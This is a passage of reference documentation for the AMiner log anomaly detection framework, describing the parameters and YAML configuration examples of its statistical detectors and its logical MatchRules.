significantly from the values observed before. * **timestamp_path**: Use this path value for timestamp based bins. 
String (**required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **min_bin_elements**: Evaluate the latest bin only after at least that number of elements was added to it. Integer, min: 1 (**required**) * **min_bin_time**: Evaluate the latest bin only when the first element is received after min_bin_time has elapsed. Integer, min: 1 (**required**) * **debug_mode**: Enables debug output. Boolean(Default: False) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: None paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 MatchValueStreamWriter ~~~~~~~~~~~~~~~~~~~~~~ This component extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. * **stream**: Stream to write the value of the match to. Possible values: 'sys.stdout' or 'sys.stderr' ( **required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **separator**: Use this string as a separator for the output. String ( **required**) * **missing_value_string**: Write this string if the value is missing. ( **required**) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. 
code-block:: yaml Analysis: - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" MinimalTransitionTimeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for minimal transition times between states (e.g. value combinations of stated paths). * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, **required**). * **id_path_list** parser paths where id values can be stored in all relevant log event types (list of strings, **required**). * **ignore_list** parser paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, default: []). * **allow_missing_id** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, default: False). * **num_log_lines_solidify_matrix** number of processed log lines after which the matrix is solidified. This process is periodically repeated (integer, default: 10000). * **time_output_threshold** threshold for the tested minimal transition time which has to be exceeded to be tested (float, default: 0). * **anomaly_threshold** threshold for the confidence which must be exceeded to raise an anomaly (float, default: 0.05). * **persistence_id** name of persistence document (string, default: 'Default'). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean, default: True). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, default: False). .. 
code-block:: yaml Analysis: - type: MinimalTransitionTimeDetector id: MinimalTransitionTimeDetector paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' anomaly_threshold: 0.05 MissingMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by target_path_list, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **check_interval**: This integer(seconds) defines the interval in which pre-set or learned values need to appear. Integer min:1 (Default: 3600) * **realert_interval**: This integer(seconds) defines the interval in which the AMiner should alert us about missing token values. Integer min: 1 (Default: 3600) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True .. 
seealso:: `Wiki: HowTo MissingMatchPathValueDetector `_ NewMatchIdValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector works similar to the NewMatchPathValueComboDetector, but allows to generate combos across multiple log events that are connected by a common value, e.g., trace ID. * **paths** parser paths of values to be analyzed (required, list of strings). * **id_path_list** one or more paths that specify trace information, i.e., an identifier that specifies which log events belong together (required, list of strings, defaults to empty list). * **min_allowed_time_diff** the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff (required, float, defaults to 5.0). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. 
code-block:: yaml Analysis: - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True NewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new value combinations in multiple parser paths. * **paths** parser paths of values to be analyzed (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True NewMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new values in a parser path. * **paths** parser paths of values to be analyzed. Multiple paths mean that values from all specified paths are mixed together (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). 
* **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed values should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True ParserCount ~~~~~~~~~~~ This component counts occurring combinations of values and periodically sends the results as a report. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **report_interval** time interval in seconds in which the reports are sent (integer, defaults to 10). * **labels** list of strings that are added to the report for each path in paths parameter (must be the same length as paths list). (list of strings, defaults to empty list) * **split_reports_flag** boolean flag to send report for each path in paths parameter separately when set to True (boolean, defaults to False). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: ParserCount id: ParserCount paths: - "/model/type/syscall/syscall" report_interval: 10 PathValueTimeIntervalDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector analyzes the time intervals of the appearance of log_atoms. It sends a report if log_atoms appear at times outside of the intervals. The considered time intervals depend on the combination of values in the target_paths of target_path_list. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. 
When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to True). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **time_period_length** length of the time window in seconds for which the appearances of log lines are identified with each other (integer, defaults to 86400). * **max_time_diff** maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly (integer, defaults to 360). * **num_reduce_time_list** number of new time entries appended to the time list, before the list is being reduced (integer, defaults to 10). .. code-block:: yaml Analysis: - type: PathValueTimeIntervalDetector id: PathValueTimeIntervalDetector paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" time_period_length: 86400 max_time_diff: 3600 num_reduce_time_list: 10 PCADetector ~~~~~~~~~~~ This class creates events if event or value occurrence counts are outliers in PCA space. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (list of strings). 
* **window_size** the length of the time window for counting in seconds (float, defaults to 600 seconds). * **min_anomaly_score** the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are > 1 to detect outliers with respect to currently trained PCA matrix (float, defaults to 1.1). * **min_variance** the minimum variance covered by the principal components (float in range [0, 1], defaults to 0.98). * **num_windows** the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows (integer, defaults to 50). * **persistence_id** name of persistence document (string, defaults to "Default"). * **learn_mode** specifies whether new count measurements are added to the PCA count matrix (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **output_event_handlers** list of event handler ids that anomalies are forwarded to (list of strings, default is to send to all event handlers). .. code-block:: yaml Analysis: - type: PCADetector id: PCADetector paths: - "/model/username" - "/model/service" window_size: 60 min_anomaly_score: 1.2 min_variance: 0.95 num_windows: 100 learn_mode: true TSAArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to track appearance frequencies of event lines. * **paths** at least one of the parser paths in this list needs to appear in the event to be analyzed (list of strings). * **event_type_detector** used to track the number of event lines in the time windows (string). 
* **waiting_time_for_tsa** time in seconds, until the time windows are being initialized (integer, defaults to 300 seconds). * **num_sections_waiting_time_for_tsa** number of sections of the initialization window (integer, defaults to 10). * **acf_pause_interval_percentage** states which area of the results of the ACF are not used to find the highest peak (float, defaults to 0.2). * **build_sum_over_values** states if the sum of a series of counts is built before applying the TSA (boolean, defaults to false). * **num_periods_tsa_ini** Number of periods used to initialize the Arima-model (integer, defaults to 20). * **num_division_time_step** Number of divisions of the time window to calculate the time step (integer, defaults to 10). * **alpha** significance level of the estimated values (float, defaults to 0.05). * **num_min_time_history** minimal number of values of the time_history after it is initialized (integer, defaults to 20). * **num_max_time_history** maximal number of values of the time_history (integer, defaults to 30). * **num_results_bt** number of results which are used in the binomial test, which is used before reinitializing the ARIMA model (integer, defaults to 15). * **alpha_bt** significance level for the bt test (float, defaults to 0.05). * **round_time_interval_threshold** Threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list (float, defaults to 0.02). * **acf_threshold** threshold, which must be exceeded by the highest peak of the cdf function of the time series, to be analyzed (float, defaults to 0.2). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. 
The default value is [] as None is not iterable (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **acf_auto_pause_interval** states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. * **acf_auto_pause_interval_num_min** states the number of values in which a local minimum must be the minimum, to be considered a local minimum of the function and not an outlier. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **min_log_lines_per_time_step** states the minimal average number of log lines per time step to make a TSA. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD save_values: False - type: 'TSAArimaDetector' id: TSA event_type_detector: ETD waiting_time_for_tsa: 1728000 num_sections_waiting_time_for_tsa: 1000 num_division_time_step: 10 alpha: 0.05 num_results_bt: 30 alpha_bt: 0.05 num_max_time_history: 30000 round_time_interval_threshold: 0.1 acf_threshold: 0.02 PathArimaDetector ~~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to analyze the values of the chosen paths. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. * **event_type_detector** used to track the number of events in the time windows. * **persistence_id** name of persistence document. * **output_logline** specifies whether the full parsed log atom should be provided in the output. 
* **learn_mode** specifies whether new frequency measurements override ground truth frequencies. * **num_init** number of lines processed before the period length is calculated. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **alpha** significance level of the estimated values. * **alpha_bt** significance level for the bt test. * **num_results_bt** number of results which are used in the binomial test. * **num_min_time_history** minimal number of values of the time_history after it is initialized. * **num_max_time_history** maximum number of values of the time_history. * **num_periods_tsa_ini** number of periods used to initialize the Arima-model. .. code-block:: yaml Analysis: - type: "EventTypeDetector" id: ETD - type: 'PathArimaDetector' id: PTSA event_type_detector: ETD paths: ["/model/model/val1", "/model/model/val2"] num_init: 20 force_period_length: True set_period_length: 15 num_periods_tsa_ini: 10 SlidingEventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency exceedances with a sliding window approach. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **set_upper_limit** sets the upper limit of the frequency test to the specified value. 
* **local_maximum_threshold** sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: SlidingEventFrequencyDetector id: SEFD window_size: 3600 set_upper_limit: 10 TimeCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~ This component tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. .. code-block:: yaml Analysis: - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 .. _TimeCorrelationViolationDetector: TimeCorrelationViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 .. 
code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 .. seealso:: :ref:`MatchRules` SimpleMonotonicTimestampAdjust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adjusts decreasing timestamps of new records to the maximum observed so far to ensure monotonicity for other analysis components. TimestampsUnsortedDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector is useful to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. .. code-block:: yaml Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector ValueRangeDetector ~~~~~~~~~~~~~~~~~~ This detector generates ranges for numeric values, detects values outside of these ranges, and automatically extends ranges when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for value range generation (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which numeric ranges should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). 
* **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'ValueRangeDetector' paths: - '/parser/value' id_path_list: - '/parser/id' learn_mode: True VariableCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~ First, this detector finds a list of viable variables for each event type. Second, it builds pairs of variables. Third, correlations are generated and thereafter tested and updated. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** the id of the EventTypeDetector instance this detector depends on. Used to get the event numbers and values of the variables, etc. * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **num_init** minimal number of lines of one event type to initialize the correlation rules. * **num_update** number of lines after the initialization after which the correlations are periodically tested and updated. * **check_cor_thres** threshold for the number of allowed different values of the distribution to be considered a correlation. * **check_cor_prob_thres** threshold for the difference of the probability of the values to be considered a correlation. * **check_cor_num_thres** number of allowed different values for the calculation if the distribution can be considered a correlation. 
* **min_values_cors_thres** minimal number of appearances of values on the left side to consider the distribution as a possible correlation. * **new_vals_alarm_thres** threshold which has to be exceeded by the number of new values divided by the number of old values to report an anomaly. * **disc_div_thres** diversity threshold for variables to be considered discrete. * **num_steps_create_new_rules** number of update steps, for which new rules are generated periodically. * **num_upd_until_validation** number of update steps, for which the rules are validated periodically. * **num_end_learning_phase** number of update steps until the update phase ends and the test phase begins. False if no End should be defined. * **num_bt** number of considered testsamples for the binomial test. * **alpha_bt** significance level for the binomialtest for the test results. * **used_homogeneity_test** states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. * **alpha_chisquare_test** significance level alpha for the chisquare test. * **max_dist_rule_distr** maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. * **used_presel_meth** used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']. * **intersect_presel_meth** states if the intersection or the union of the possible correlations found by the presel_meth is used for the resulting correlations. * **percentage_random_cors** percentage of the randomly picked correlations of all possible ones in the preselection method random. * **match_disc_vals_sim_tresh** similarity threshold for the preselection method pick_cor_match_disc_vals. * **exclude_due_distr_lower_limit** lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. 
* **match_disc_distr_threshold** threshold for the preselection method pick_cor_match_disc_distr. * **used_cor_meth** used correlation detection methods. The implemented methods are ['Rel', 'WRel']. * **used_validate_cor_meth** used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. * **validate_cor_cover_vals_thres** threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. * **validate_cor_distinct_thres** threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions must surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableCorrelationDetector' event_type_detector: ETD num_init: 10000 num_update: 1000 num_steps_create_new_rules: 10 used_presel_meth: ['matchDiscDistr', 'excludeDueDistr'] used_validate_cor_meth: ['distinctDistr', 'coverVals'] used_cor_meth: ['WRel'] VerboseUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates verbose output for unparsed events. Because the output for unparsed events typically includes the raw log line, make sure the event handlers receiving it are suitable for potentially sensitive log content. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'VerboseUnparsedAtomHandler' id: vuah SimpleUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates basic output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'SimpleUnparsedAtomHandler' id: suah VariableTypeDetector ~~~~~~~~~~~~~~~~~~~~ This detector analyses each variable of the event_types by assigning them the implemented variable types. * **paths** List of paths, which variables are being tested for a type. All other paths will not get a type assigned. 
* **learn_mode** states, if found variable types are updated when a test fails. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **save_statistics** tracks the indicators and changed variable types, if set to True. * **use_empiric_distr** states if empiric distributions of the values should be used if no continuous distribution is detected * **used_gof_test** states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. * **gof_alpha** significance level for p-value for the distribution test of the initialization. * **s_gof_alpha** significance level for p-value for the sliding gof-test in the update step. * **s_gof_bt_alpha** significance level for the binomialtest of the test results of the s_gof-test. * **d_alpha** significance level for the binomialtest of the single discrete variables. * **d_bt_alpha** significance level for the binomialtest of the test results of the discrete tests. * **div_thres** threshold for diversity of the values of a variable. The higher the more values have to be distinct to be considered to be continuous distributed. * **sim_thres** threshold for similarity of the values of a variable. The higher the more values have to be common to be considered discrete. * **indicator_thres** threshold for the variable indicators to be used in the event indicator. 
* **num_init** number of lines processed before detecting the variable types. * **num_update** number of values for which the variableType is updated. * **num_update_unq** number of values for which the values of type unq is unique (last num_update + num_update_unq values are unique). * **num_s_gof_values** number of values which are tested in the s_gof-test. * **num_s_gof_bt** number of tested s_gof-tests for the binomialtest of the test results of the s_gof-tests. * **num_d_bt** number of tested discrete samples for the binomialtest of the test results of the discrete tests. * **num_pause_discrete** number of paused updates, before the discrete var type is adapted. * **num_pause_others** number of paused updates, before trying to find a new variable type for the variable type others. * **test_gof_int** states if integer number should be tested for the continuous variable type. * **num_stop_update** switch the LearnMode to False after num_stop_update processed lines. If False LearnMode will not be switched to False. * **silence_output_without_confidence** silences all messages without a confidence-entry. * **silence_output_except_indicator** silences all messages which are not related with the calculated indicator. * **num_var_type_hist_ref** states how long the reference for the var_type_history_list is. The reference is used in the evaluation. * **num_update_var_type_hist_ref** number of update steps before the var_type_history_list is being updated. * **num_var_type_considered_ind** this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. * **num_stat_stop_update** number of static values of a variable, to stop tracking the variable type and read in in eventTypeD. Default is False. * **num_updates_until_var_reduction** number of update steps until the variables are tested, if they are suitable for an indicator. 
If not suitable, they are removed from the tracking of EvTypeD. Set to 0 to analyze all variables. Default is 20. * **var_reduction_thres** threshold for the reduction of variable types. The most likely variable type other than 'others' must have a higher relative appearance for the variable to be further checked. * **num_skipped_ind_for_weights** number of the skipped indicators for the calculation of the indicator weights. * **num_ind_for_weights** number of indicators used in the calculation of the indicator weights. * **used_multinomial_test** states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi'. Where 'MT' means the original MT, 'Approx' is the approximation with single BTs and 'Chi' is the ChisquareTest. * **used_range_test** states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. * **range_alpha** significance level for the range variable type. * **range_threshold** maximal proportional deviation from the range before the variable type is rejected. * **range_limits_factor** factor for the limits of the range variable type. * **num_reinit_range** number of update steps until the range variable type is reinitialized. Set to zero if not desired. * **dw_alpha** significance level of the Durbin-Watson test used to test for serial correlation. If the test fails the type range is assigned to the variable instead of continuous. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableTypeDetector' event_type_detector: ETD num_init: 200 num_update: 100 num_s_gof_values: 100 .. _MatchRules: ---------- MatchRules ---------- The following detectors work with MatchRules: * :ref:`AllowlistViolationDetector` * :ref:`TimeCorrelationViolationDetector` .. 
note:: MatchRules must be defined in the "Analysis"-part of the configuration. Every MatchRule can also define a :ref:`MatchAction` which is run when the MatchRule is applied. AndMatchRule ~~~~~~~~~~~~ This component provides a rule to match all subRules (logical and). .. code-block:: yaml Analysis: - type: AndMatchRule id: and_match_rule1 sub_rules: - "path_exists_match_rule1" - "negation_match_rule1" OrMatchRule ~~~~~~~~~~~ This component provides a rule to match any subRules (logical or). .. code-block:: yaml Analysis: - type: OrMatchRule id: or_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ParallelMatchRule ~~~~~~~~~~~~~~~~~ This component is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. .. code-block:: yaml Analysis: - type: ParallelMatchRule id: parallel_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ValueDependentDelegatedMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. NegationMatchRule ~~~~~~~~~~~~~~~~~ Match elements of this component return true when the subrule did not match. .. code-block:: yaml Analysis: - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" PathExistsMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path was found in the parsed match data. .. 
code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" ValueMatchRule ~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly the given parsed value. .. code-block:: yaml Analysis: - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" ValueListMatchRule ~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly one of the values included in the value list. ValueRangeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and the value is included in [lower, upper] range. StringRegexMatchRule ~~~~~~~~~~~~~~~~~~~~ Elements of this component return true when the given path exists and the string repr of the value matches the regular expression. The expression is evaluated against log content that an attacker may influence, so avoid patterns prone to catastrophic backtracking (e.g. nested or overlapping quantifiers), which could stall the analysis pipeline. ModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. ValueDependentModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in a [lower, upper] range selected by values from the match. IPv4InRFC1918MatchRule ~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Other non-routable ranges such as loopback (127.0.0.0/8), link-local (169.254.0.0/16) or shared address space (100.64.0.0/10) are not covered by RFC 1918 and therefore not matched; use ValueRangeMatchRule for those. This could also be done by distinct range match elements, but as this kind of matching is common, a dedicated element is provided for it. 
